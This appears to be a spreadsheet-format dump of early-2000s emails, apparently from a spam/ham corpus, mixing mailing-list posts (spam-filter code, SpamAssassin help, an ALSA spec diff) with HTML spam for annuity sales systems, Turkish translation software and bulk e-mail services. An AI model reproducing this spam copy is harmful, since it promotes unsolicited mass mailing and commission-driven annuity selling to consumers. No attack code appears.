 &lt;head&gt;
 &lt;title&gt;Roth conversions =3D jumbo annuity sales&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;!--
 From: Senior Selling
 --&gt;
 &lt;body bgcolor=3D"#ffffff" text=3D"#000000"&gt;
 &lt;table width=3D"550" cellpadding=3D"2" cellspacing=3D"2" =
 bgcolor=3D"#ffffff" align=3D"center"&gt;
   &lt;tr&gt;=20
     &lt;td&gt;&lt;img src=3D"http://iiq.us/images/gsl/turnkey/20020520-101.gif" =
 width=3D"550" height=3D"79" alt=3D"What good is a great concept (Roth =
 conversion) without a turnkey system to sell it?"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;=20
     &lt;td&gt;&lt;img src=3D"http://iiq.us/images/gsl/turnkey/20020520-102.gif" =
 width=3D"550" height=3D"396"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;=20
     &lt;td&gt;=20
       &lt;font face=3D"Georgia, Times New Roman, Times, serif" size=3D"2" =
 color=3D"#000066"&gt;=20
       &lt;br&gt;&lt;p align=3D"center"&gt;
         &lt;font size=3D"4"&gt; Introducing the Roth Conversion turnkey =
 selling system&lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;Our top producing roth conversion agent (&lt;b&gt;sold 10 jumbo =
 annuities,=20
         200k sales with 14%+ commissions&lt;/b&gt;) has shared with us his =
 secrets of=20
         selling the roth conversion concept. Per his input, we have =
 created the=20
         roth conversion &amp;quot;turnkey sales process&amp;quot;.&lt;/p&gt;
       &lt;p&gt;The system includes client postcards, client brochures, a =
 client worksheet=20
         (perfect for introducing the roth conversion program), a full =
 marketing=20
         presentation, etc. &lt;b&gt;If he can do it, so can you!&lt;/b&gt;&lt;/p&gt;
       &lt;p align=3D"center"&gt;&lt;b&gt;To join us for the brand new &amp;quot;sales =
 presentation&amp;quot;=20
         teleconference, call in Monday, Wednesday or Friday at 12:00 =
 noon Pacific/3=20
         p.m. Eastern at:&lt;/b&gt;&lt;br&gt;
         &lt;img src=3D"http://iiq.us/images/gsl/turnkey/20020520-2.jpg" =
 width=3D"501" height=3D"76" alt=3D"702-579-4902"&gt;=20
       &lt;/p&gt;
       &lt;/font&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;=20
     &lt;td align=3D"center"&gt;
       &lt;b&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;&lt;br&gt;
       To find out more about the content of the call complete the form =
 below&lt;br&gt;
       and you will be immediately directed to the &amp;quot;conference =
 call&amp;quot; page.
       &lt;table border=3D1 cellpadding=3D2 width=3D100% =
 bordercolor=3D"#000000" cellspacing=3D"0"&gt;
               &lt;form =
 action=3D"http://www.gsladvisory.com/froco_data/gsl_page.cfm" =
 method=3Dpost&gt;
                 &lt;input name=3DxSubject type=3Dhidden =
 value=3D"InsuranceIQ Email Request"&gt;
                 &lt;tr bgcolor=3D#ffcc33&gt;=20
                   &lt;td width=3D20%&gt;&lt;b&gt;&lt;font color=3D#000000 =
 size=3D2&gt;First Name:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                   &lt;td width=3D30%&gt;=20
                     &lt;input name=3Dfirstname&gt;
                   &lt;/td&gt;
                   &lt;td width=3D50%&gt;=20
                     &lt;input name=3DSubmit type=3Dsubmit value=3D"Send =
 Information"&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr bgcolor=3D#ffcc33&gt;=20
                   &lt;td width=3D20%&gt;&lt;b&gt;&lt;font color=3D"#000000" =
 size=3D"2"&gt;Last Name:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                   &lt;td width=3D30%&gt;=20
                     &lt;input name=3Dlastname&gt;
                   &lt;/td&gt;
                   &lt;td rowspan=3D3 width=3D50%&gt;&lt;font color=3D#000000 =
 size=3D1&gt;Note that=20
                     when you press the &amp;quot;Send Information&amp;quot; =
 button the=20
                     screen may not change, but we will still receive =
 your information=20
                     and get back to you. Another way to order our sample =
 presentation=20
                     is to visit our website at &lt;a =
 href=3D"http://www.gsladvisory.com/froco"&gt;www.gsladvisory.com/froco&lt;/a&gt;.&lt;=
 /font&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr bgcolor=3D#ffcc33&gt;=20
                   &lt;td width=3D20%&gt;&lt;b&gt;&lt;font color=3D#000000 =
 size=3D2&gt;E-Mail:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                   &lt;td width=3D30%&gt;=20
                     &lt;input name=3DEmail&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr bgcolor=3D#ffcc33&gt;=20
                   &lt;td width=3D20%&gt;&lt;b&gt;&lt;font color=3D#000000 =
 size=3D2&gt;Phone#:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                   &lt;td width=3D30%&gt;=20
                     &lt;input name=3D"Phone"&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
               &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
             &lt;/table&gt;
             &amp;nbsp;&lt;/font&gt;&lt;/b&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
   &lt;tr&gt;=20
     &lt;td align=3D"center"&gt;
       &lt;img src=3D"http://iiq.us/images/gsl7/gsl_big.gif" width=3D"256" =
 height=3D"69" alt=3D"GSL Advisory"&gt;&lt;br&gt;&lt;br&gt;
       &lt;p align=3D"left"&gt;&lt;font size=3D"1" face=3D"Arial, Helvetica, =
 sans-serif"&gt;These materials are for "agent use only".  You should be a =
 practicing, licensed  and appointed annuity agent to order this =
 information.&lt;/font&gt;&lt;/p&gt;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&lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_268694_01C20276.CCE3E8C0--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Another low probability event
</t>
  </si>
  <si>
    <t xml:space="preserve">So, a new family moved in down the street, with two kids, making us very
 excited that there might be a child around the same age (20 months) as our
 daughter Tatum. While we're talking to the family, we discover that their
 daughter Kiara was born the same day as Tatum, within two hours, in the same
 exact maternity ward. Both mothers were undoubtedly in labor at the same
 time.
 Wow.
 - Jim
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; Proving, once again, that aviators get all the chicks...
 Just as long as they have the wherewithal
 for avgas, anyway.
 I think Turpin once calculated that one
 could do a decent amount of messing about
 for about $30K of boat and $12K/year in
 living expenses.
 What are the equivalent figures for live
 aboard aircraft?
 -Dave
 (How difficult would it be to find the
 harbormaster, after mooring to the top
 of the Empire State Building?)
</t>
  </si>
  <si>
    <t xml:space="preserve">[Anthony Baxter]
 &gt; The other thing on my todo list (probably tonight's tram ride home) is
 &gt; to add all headers from non-text parts of multipart messages. If nothing
 &gt; else, it'll pick up most virus email real quick.
 See the checkin comments for timtest.py last night.  Adding this code gave a
 major reduction in the false negative rate:
 def crack_content_xyz(msg):
     x = msg.get_type()
     if x is not None:
         yield 'content-type:' + x.lower()
     x = msg.get_param('type')
     if x is not None:
         yield 'content-type/type:' + x.lower()
     for x in msg.get_charsets(None):
         if x is not None:
             yield 'charset:' + x.lower()
     x = msg.get('content-disposition')
     if x is not None:
         yield 'content-disposition:' + x.lower()
     fname = msg.get_filename()
     if fname is not None:
         for x in fname.lower().split('/'):
             for y in x.split('.'):
                 yield 'filename:' + y
     x = msg.get('content-transfer-encoding:')
     if x is not None:
         yield 'content-transfer-encoding:' + x.lower()
 ...
     t = ''
     for x in msg.walk():
         for w in crack_content_xyz(x):
             yield t + w
         t = '&gt;'
 I *suspect* most of that stuff didn't make any difference, but I put it all
 in as one blob so don't know which parts did and didn't help.
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Actually this is output from an old java program called jitter.
 It's very useful for those of us with digital cameras who end up
 taking 50+ pictures a day while on vacation ;)
 -- 
 Gary Lawrence Murphy - garym@teledyn.com - TeleDynamics Communications
  - blog: http://www.auracom.com/~teledyn - biz: http://teledyn.com/ -
   "Computers are useless. They can only give you answers." (Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] razor2 auth? 
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Randy Bush said:
 &gt; &gt;&gt; freebsd -stable
 &gt; &gt;&gt; spamassassin 2.41
 &gt; &gt;&gt;     spamasassin -r
 &gt; &gt;&gt; results in
 &gt; &gt;&gt; razor2 report failed: No such file or directory Razor2 reporting requires 
 &gt; authentication at /usr/local/lib/perl5/site_perl/5.005/Mail/SpamAssassin/Repo
 &gt; rter.pm line 77.
 &gt; &gt;&gt; used to work until upgrade
 &gt; &gt; 
 &gt; &gt; using spamd?  try the -H switch. 
 &gt; 
 &gt; no, pipinng the message to "spamassassin -r" from within my mail
 &gt; user agent, VM under Emacs.
 oops, sorry -- didn't notice the "report" bit.  Yes, you need to register
 for Razor2 -- "razor-register" or "razor-admin -register" if I recall
 correctly.
 --j.
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 23 Aug 2002, Robert Harley wrote:
 --]It's an amusing anecdote, I don't know if it's true or not, but certainly
 --]nothing here supports the authoritative sounding conclusion "Status: False".
 --]
 So thats the trick, just let any anecdotal utterances you LIKE be deemed
 true until proven false, and then hold other data to the opposite
 standard...
 Yeah, I see how that could be a handy tool RH.
 (before teh lablemongers are out and about, I could give a shit what
 BubbaU utters, its all shite. Kill your idols folks, your slips are
 showing)
 -tom
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">HTML&gt;
 &lt;HEAD&gt;
 &lt;TITLE&gt;&lt;/TITLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgcolor=white&gt;
 &lt;table&gt;
 &lt;tr&gt;
    &lt;td&gt;
    &lt;center&gt;&lt;br&gt;
    &lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;     &lt;/center&gt;&lt;/B&gt;
    &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;P align=center&gt;&lt;FONT  color=white size =7 &gt;&lt;STRONG&gt;
 &lt;TABLE cellSpacing=1 cellPadding=1 width="501" border=5 style="WIDTH: 501px; HEIGHT: 907px"&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD&gt;&lt;IMG alt="" 
       src="http://www.bilsag.com/web1.jpg"&gt;&lt;/TD&gt;
     &lt;TD bgcolor=red&gt;&lt;FONT size=4
       color=white&gt;&lt;EM&gt;&lt;STRONG&gt;NTERNETTE KENDNZ DAHA Y HSSEDECEKSNZ.
 	  NGLZCE WEB SAYFALARININ TRKE'YE EVR YAZILIMI
 	   &lt;/STRONG&gt;&lt;/EM&gt; &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
   &lt;TD bgcolor=palegoldenrod&gt;&lt;FONT size=7 
       color=darkblue&gt;&lt;EM&gt;&lt;STRONG&gt;$ 39+KDV&lt;/STRONG&gt;&lt;/EM&gt; &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD  &gt;&lt;IMG alt="" 
       src="http://www.bilsag.com/cev1.jpg"&gt;&lt;/TD&gt;
     &lt;TD bgcolor=red&gt;&lt;FONT size=4
       color=white&gt;&lt;STRONG&gt;&lt;EM&gt; NGLZCE'DEN TRKE'YE BLGSAYAR DESTEKL
 	    METN EVR YAZILIMI  
 	 (MS-WORD ALTINDA KULLANIM, TM WINDOWS VERSYONLARI LE UYUMLU)
 	  &lt;/EM&gt;&lt;/STRONG&gt; &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
   &lt;TD bgcolor=palegoldenrod&gt;&lt;FONT size=7 
       color=darkblue&gt;&lt;STRONG&gt;&lt;EM&gt;$ 69+KDV&lt;/EM&gt;&lt;/STRONG&gt; &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD bgcolor=darkblue&gt;&lt;FONT size=6 color=white&gt;&lt;STRONG&gt;&lt;EM&gt;K YAZILIM &amp;nbsp; BRLKTE&lt;/FONT&gt;&lt;/EM&gt;    &lt;/STRONG&gt;&lt;/TD&gt;
     &lt;TD bgcolor=darkblue&gt;&lt;FONT size=7 
       color=white&gt;&lt;STRONG&gt;&lt;EM&gt;$ 
   89+KDV&lt;/EM&gt;&lt;/STRONG&gt; 
 &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P align=center&gt;&lt;STRONG&gt;&lt;a href="http://www.bilsag.com/index.html"&gt;&lt;FONT color=darkcyan size=2&gt;Ayrntl Bilgi 
       in&amp;nbsp; &lt;/FONT&gt;&lt;/STRONG&gt;&lt;STRONG&gt;&lt;FONT 
       color=darkcyan size=2&gt;  tklayn&lt;/FONT&gt;&lt;/A&gt;&lt;/STRONG&gt; 
       &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/P&gt;
       &lt;P align=center&gt;
       &amp;nbsp;&lt;A href="http://www.bilsag.com/siparis.htm"&gt;&lt;IMG alt="" src="http://www.bilsag.com/sipbuton.gif" border=0
       &gt;&lt;/A&gt; &lt;/P&gt;
       &lt;P align=center&gt;&lt;FONT color=#ff0000&gt;&lt;STRONG&gt;BLSAG Ltd.&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P align=center&gt;&lt;FONT size=2&gt;&lt;FONT color=#ff0000&gt;&lt;STRONG&gt;AHMET MTHAT 
       EFEND SOK. 22/1 ANKAYA 06700 / ANKARA /&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P align=center&gt;&lt;FONT size=2&gt;&lt;FONT color=#ff0000&gt;&lt;STRONG&gt;&lt;FONT 
       size=+0&gt;Tlf: 0312. 439 2850/ Fax: 0312. 439 9347&lt;/FONT&gt; 
       &lt;/STRONG&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P align=center&gt;&lt;A href="mailto:bilsag@msn.com"&gt;&lt;FONT color=#ff0000 
       size=3&gt;&lt;STRONG&gt;bilsag@msn.com&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;/P&gt;
     &lt;TD&gt;
       &lt;P align=center&gt;&amp;nbsp;&lt;/P&gt;
       &lt;P align=center&gt;&amp;nbsp;&lt;/P&gt;
       &lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;
 &lt;P&gt;&lt;/P&gt;
 &lt;form action="http://www.bilsag.com/iptal1.asp" method="post"&gt;
 &lt;center&gt;
 &lt;TABLE WIDTH="540" CELLSPACING=1 CELLPADDING=1 BORDER=0 bgcolor="#dddddd"&gt;
 &lt;TR&gt;
 &lt;TD BGCOLOR="#eeeeee" align="middle"&gt;&lt;FONT FACE="Verdana, Arial" SIZE="-1" COLOR="#000000"&gt;
 &lt;strong&gt;E-posta adres listemizden&lt;/strong&gt; kmak iin&lt;strong&gt;IKAR&lt;/strong&gt; tuuna basnz
 &lt;/FONT&gt;
 &lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD BGCOLOR="#eeeeee" align="middle"&gt;
 &lt;INPUT NAME="e" VALUE="sitescooper-talk@lists.sourceforge.net" SIZE=25 
      &gt;&lt;/FONT&gt;                   
 &lt;INPUT TYPE="submit" VALUE="kar"&gt;
 &lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD BGCOLOR="#ffffff" align=right&gt;
 &lt;FONT FACE="arial" SIZE="1" COLOR="#000000"&gt;Bu elektronik posta: sitescooper-talk@example.sourceforge.net e gnderilmitir&lt;/FONT&gt;
 &lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;
 &lt;/center&gt;
 &lt;/form&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
 -------------------------------------------------------
 This sf.net email is sponsored by: OSDN - Tired of that same old
 cell phone?  Get a new here for FREE!
 https://www.inphonic.com/r.asp?r=sourceforge1&amp;refcode1=vs3390
 _______________________________________________
 Sitescooper-talk mailing list
 Sitescooper-talk@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/sitescooper-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Get More Orders For Anything you Sell
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dwindows-=
 1252"&gt;
 &lt;meta name=3D"GENERATOR" content=3D"Microsoft FrontPage 4.0"&gt;
 &lt;meta name=3D"ProgId" content=3D"FrontPage.Editor.Document"&gt;
 &lt;title&gt;New Page 1&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;b&gt;
 &lt;p align=3D"center"&gt;&lt;font color=3D"#cc0000" face=3D"Verdana" size=3D"6"&gt;Re=
 ach the Masses&lt;/font&gt;&lt;/p&gt;
 &lt;p align=3D"center"&gt;&lt;font color=3D"#000000" face=3D"Verdana" size=3D"6"&gt;Di=
 rect E-Mail
 Advertising&lt;/font&gt;&lt;/p&gt;
 &lt;p align=3D"center"&gt;&lt;font color=3D"#cc0000" face=3D"Verdana" size=3D"6"&gt;Th=
 e Bulk E-Mail
 Experts&lt;/font&gt;&lt;/p&gt;
 &lt;/b&gt;
 &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font color=3D"#cc0000" face=3D"Verdana" size=3D"5"=
 &gt;If we can
 reach you, You can reach them!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p align=3D"center"&gt;&lt;font face=3D"Arial" size=3D"3"&gt;&lt;br&gt;
 &lt;b&gt;500,000................................$399 US&lt;/b&gt;&lt;br&gt;
 &lt;b&gt;1,000,000.............................$699 US&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p align=3D"center"&gt;&lt;font face=3D"Arial" size=3D"3"&gt;&lt;b&gt;volume discounts av=
 ailable&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p align=3D"center"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;blockquote&gt;
   &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font face=3D"Arial" size=3D"3"&gt;For More Info or =
 to place an order,
   please leave
   your name, telephone number and&amp;nbsp; best time to call.&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
   &lt;a href=3D"mailto:jdp1@btamail.net.cn"&gt;&lt;b&gt;&lt;font size=3D"4"&gt;PLEASE CLICK =
 HERE&lt;/font&gt;&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&lt;font size=3D"+0" color=3D"#0f0f0f"&gt;To be removed from further mailings=
 , &lt;/font&gt;&lt;a href=3D"mailto:jc6@btamail.net.cn"&gt;PLEASE
 CLICK HERE&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;br&gt;
 &amp;nbsp;&lt;br&gt;
 &amp;nbsp;&lt;br&gt;
 &amp;nbsp;&lt;br&gt;
 &amp;nbsp;&lt;br&gt;
 &amp;nbsp;&lt;br&gt;
 &amp;nbsp;&lt;br&gt;
 &amp;nbsp;&lt;br&gt;
 &amp;nbsp;&lt;br&gt;
 &amp;nbsp;&lt;br&gt;
 &amp;nbsp;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Computational Recreations
</t>
  </si>
  <si>
    <t xml:space="preserve">Does anyone here know if the Computational Recreations columns from 
 Scientific American in the 70's/80's were compiled into a book or two? I 
 think I remember Martin Gardner publishing the earlier Mathematical 
 Recreations in a couple of hard covers, but I'm unsure about the later 
 column. Help?
 ...Ross...
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
 ... nor what color your passport?
 More American exceptionalism:
 &lt;http://www.iht.com/articles/72079.htm&gt;
 &gt; "The United States is the only country in the world to tax its citizens
 &gt; on a worldwide basis, irrespective of whether they spend time in the
 &gt; country or whether they have assets there," said Philip Marcovici,
 &gt; a Zurich-based lawyer with international law firm Baker and Mackenzie.
 and perhaps even irrespective of their
 current citizenship:
 &gt; Under current expatriation law, there are wealth thresholds based on
 &gt; net worth which lead to a presumption that a person giving up U.S.
 &gt; citizenship is doing so for tax reasons.
 &gt;
 &gt; Individuals who have given up their citizenship and who have earned
 &gt; $100,000 in any one of the 10 years before expatriation, or who have a
 &gt; net worth exceeding $500,000, would automatically be deemed a so-called
 &gt; "taxpatriate." Those persons would be subject to ordinary income tax
 &gt; on U.S. source income for 10 years. They would also be subject to
 &gt; U.S. estate and gift tax during the 10-year period.
 I suppose it could be much worse;
 there could be some twee affinity
 program for US citizenship, and a
 bank of phone people who only get
 paid well if they manage to keep
 one from cancelling membership...
 -Dave
 :::::::
 &gt; Last month, Congress proposed a new exit tax on all citizens who give up
 &gt; their U.S. status. If the proposal becomes law, individuals will be taxed
 &gt; as if they had either sold everything or died. This would give rise to
 &gt; immediate exposure to capital gains tax.
 To be fair, would this mean that they'd
 also immediately pay out the difference
 for anyone whose tax basis was greater
 than current estate value?
 :::::::
 &lt;http://news.bbc.co.uk/2/hi/business/2299119.stm&gt;
 &gt; ... Australian cities overall scored particularly highly in the
 &gt; [Economist Intelligence Unit] survey [of desirability for expats],
 &gt; with all five the country's urban centres surveyed ranked near the
 &gt; top of the table.
 &gt; 
 &gt; Europe was also well represented among the top 10 places. 
 &gt; 
 &gt; The top US city, Honolulu, ranked 21st, with Boston, at 28th, the
 &gt; highest ranked city on the US mainland. Canada, in contrast, sneaked
 &gt; three cities into the top ten.
 &gt; 
 &gt; The UK cities of London, 44th, and Manchester, 50th, gained only a
 &gt; mid-table rating, with Port Moresby in Papua New Guinea bottom of
 &gt; the list.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: alsa-driver.spec tweak for homemade kernels
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 --Boundary_(ID_KtnWPrcWHTTzQa7OHxPjiA)
 Content-type: text/plain; charset=us-ascii; format=flowed
 Content-transfer-encoding: 7BIT
 I use a mostly Red Hat 8.0 system, but prefer to configure and build my 
 kernel by hand.  I'd like to humbly offer a tweak to alsa-driver.spec 
 that helps it build cleanly under such circumstances.  I recognize that 
 freshrpms.net packages are designed with standard Red Hat in mind, 
 including a standard kernel RPM.  However, I hope that Matthias will 
 consider the tweak small enough to justify its incorporation.
 The diff is attached below.  The first part of the diff contains a 
 conditional that checks to see if the expected RPM is installed.  If it 
 is, %{karch} is set as before and a new %{krpm} flag is set to 1.  If 
 the expected RPM is not installed, then %{karch} is instead set using 
 "uname -p", while %{krpm} is left undefined.
 The second part of the diff is simpler.  We only require that 
 kernel-source be installed if the kernel itself came from an RPM.  (If 
 the kernel was hand-built, the presumably the user knows enough to have 
 retained the sources in the expected place.)
 Again, I realize that I'm operating "off warrantee" by not using a Red 
 Hat kernel RPM.  Matthias, if you think this tweak is reasonable and not 
 too ugly, I'd love to see you pick it up.  If not, well at least this 
 message will sit in the archives and may help other folks in the future.
 --Boundary_(ID_KtnWPrcWHTTzQa7OHxPjiA)
 Content-type: video/mng; name=diffs
 Content-transfer-encoding: base64
 Content-disposition: inline; filename=diffs
 LS0tIGFsc2EtZHJpdmVyLnNwZWMub3JpZwkyMDAyLTEwLTAxIDEzOjExOjQ0LjAwMDAwMDAw
 MCAtMDcwMAorKysgYWxzYS1kcml2ZXIuc3BlYwkyMDAyLTEwLTAyIDAwOjM4OjIyLjAwMDAw
 MDAwMCAtMDcwMApAQCAtOCw3ICs4LDEyIEBACiAlaWYgJSh1bmFtZSAtciB8IGdyZXAgLWMg
 c21wKQogCSV7ZXhwYW5kOiUlZGVmaW5lIGtzbXAgLXNtcH0KICVlbmRpZgotJWRlZmluZQlr
 YXJjaAkJJShycG0gLXEgLS1xZiAnJSV7YXJjaH0nIGtlcm5lbCV7P2tzbXB9LSV7a3ZlcnNp
 b259KQorJWlmICUocnBtIC1xIGtlcm5lbCV7P2tzbXB9LSV7a3ZlcnNpb259ID4vZGV2L251
 bGw7IGVjaG8gJD8pCisJJWRlZmluZQlrYXJjaAkJJSh1bmFtZSAtcCkKKyVlbHNlCisJJWRl
 ZmluZSBrcnBtCQkxCisJJWRlZmluZQlrYXJjaAkJJShycG0gLXEgLS1xZiAnJSV7YXJjaH0n
 IGtlcm5lbCV7P2tzbXB9LSV7a3ZlcnNpb259KQorJWVuZGlmCiAlZGVmaW5lCWtyZWx2ZXIJ
 CSUoZWNobyAle2t2ZXJzaW9ufSB8IHRyIC1zICctJyAnXycpCiAKIFN1bW1hcnk6IFRoZSBB
 ZHZhbmNlZCBMaW51eCBTb3VuZCBBcmNoaXRlY3R1cmUgKEFMU0EpIGJhc2UgZmlsZXMuCkBA
 IC0yNSw3ICszMCw4IEBACiBCdWlsZFJvb3Q6ICV7X3RtcHBhdGh9LyV7bmFtZX0tJXt2ZXJz
 aW9ufS1yb290CiBCdWlsZEFyY2g6ICV7a2FyY2h9CiBSZXF1aXJlczogYWxzYS1rZXJuZWwg
 PSAle3ZlcnNpb259LCAvc2Jpbi9kZXBtb2QKLUJ1aWxkUmVxdWlyZXM6IGtlcm5lbC1zb3Vy
 Y2UgPSAle2t2ZXJzaW9ufSwgTUFLRURFVgorJXs/a3JwbTpCdWlsZFJlcXVpcmVzOiBrZXJu
 ZWwtc291cmNlID0gJXtrdmVyc2lvbn19CitCdWlsZFJlcXVpcmVzOiBNQUtFREVWCiAKICVk
 ZXNjcmlwdGlvbgogVGhlIEFkdmFuY2VkIExpbnV4IFNvdW5kIEFyY2hpdGVjdHVyZSAoQUxT
 QSkgcHJvdmlkZXMgYXVkaW8gYW5kIE1JREkK
 --Boundary_(ID_KtnWPrcWHTTzQa7OHxPjiA)--
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Bill Stoddard wrote:
 &gt;&gt;Chuck Murcko wrote:
 &gt;&gt;
 &gt;&gt;    
 &gt;&gt;
 &gt;&gt;&gt;Heh, ten years ago saying the exact same words was most definitely not
 &gt;&gt;&gt;"parroting the party line".
 &gt;&gt;&gt;
 &gt;&gt;&gt;It was even less so thirty years ago. My story remains the same, take
 &gt;&gt;&gt;it or leave it. I've said the same words to white supremacists as to
 &gt;&gt;&gt;suburban leftist punks as to homeys as to French Irish, etc. etc.:
 &gt;&gt;&gt;
 &gt;&gt;&gt;I don't have to agree with anything you say. I *am* obligated to
 &gt;&gt;&gt;defend to the death your right to say it. I don't give a rat's ass
 &gt;&gt;&gt;where you say it, even in France. I don't care where the political
 &gt;&gt;&gt;pendulum has swung currently.
 &gt;&gt;&gt;
 &gt;&gt;&gt;Chuck
 &gt;&gt;&gt;      
 &gt;&gt;&gt;
 &gt;&gt;I had to laugh at Rumsfield yesterday - when he was heckled by
 &gt;&gt;protestors, he said something like "They couldn't do that in Iraq."
 &gt;&gt;Meanwhile, from what I could tell, the protestors were being arrested.
 &gt;&gt;
 &gt;&gt;Owen
 &gt;&gt;    
 &gt;&gt;
 &gt;
 &gt;Trying to shoutdown a speaker or being loud and rowdy while someone else is
 &gt;trying to speak (in the vernacular, 'getting in their face') is rude and
 &gt;disrespectful.  And persistently getting in someones face is assault, a
 &gt;criminal offense. If these people have something to say, they can say it
 &gt;with signs or get their own venue.  And here is something else to chew on...
 &gt;these protesters are NOT interested in changing anyones mind about what
 &gt;Rumsfield is saying. How likely are you to change someone's mind by being
 &gt;rude and disrespectful to them? Is this how to win friends and influence
 &gt;people? Either these folks are social misfits who have no understanding of
 &gt;human interactions (else they would try more constructive means to get their
 &gt;message across) or they are just out to get their rocks off regardless of
 &gt;how it affects other people, and that is immoral at best and downright evil
 &gt;at worst.
 &gt;
 &gt;Bill
 &gt;  
 &gt;
 Polite and respectful protest is acceptable then. No dumping tea in the 
 harbour or anything like that.
 I think the primary purpose of loud and rowdy protests is to get on 
 television, and that the tactics can be
 justified as a reaction to a systematic removal of alternative 
 viewpoints from that medium. On the other hand,
 it was a priceless TV moment. There was nothing resembling assault, and 
 the protestors were not in anybody's face
 (at least in my understanding of the vernacular).
 And no, being rude and disrespectful is not the way to influence 
 politicians, but the standard way of using lobbyists and
 writing checks is beyond many of us.
 Owen
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, Jul 31, 2002 at 12:51:29 +0200, David Neary wrote:
 &gt; SoloCDM wrote:
 &gt; &gt; Are there any mailing lists (non-newsgroups) for C++ and C Beginners
 &gt; &gt; and Advanced programmers?
 &gt; 
 &gt; For C++, I would guess that the comp.lang.c++ FAQ is a good place
 &gt; to start - they're likely to have links to suggested reading
 &gt; material.
 &gt; 
 &gt; If you're going to do any amount of C programming, you should
 &gt; think about getting K&amp;R2 (The C programming language, 2nd
 &gt; edition, by Kernighan and Ritchie), for C++ the equivalent book
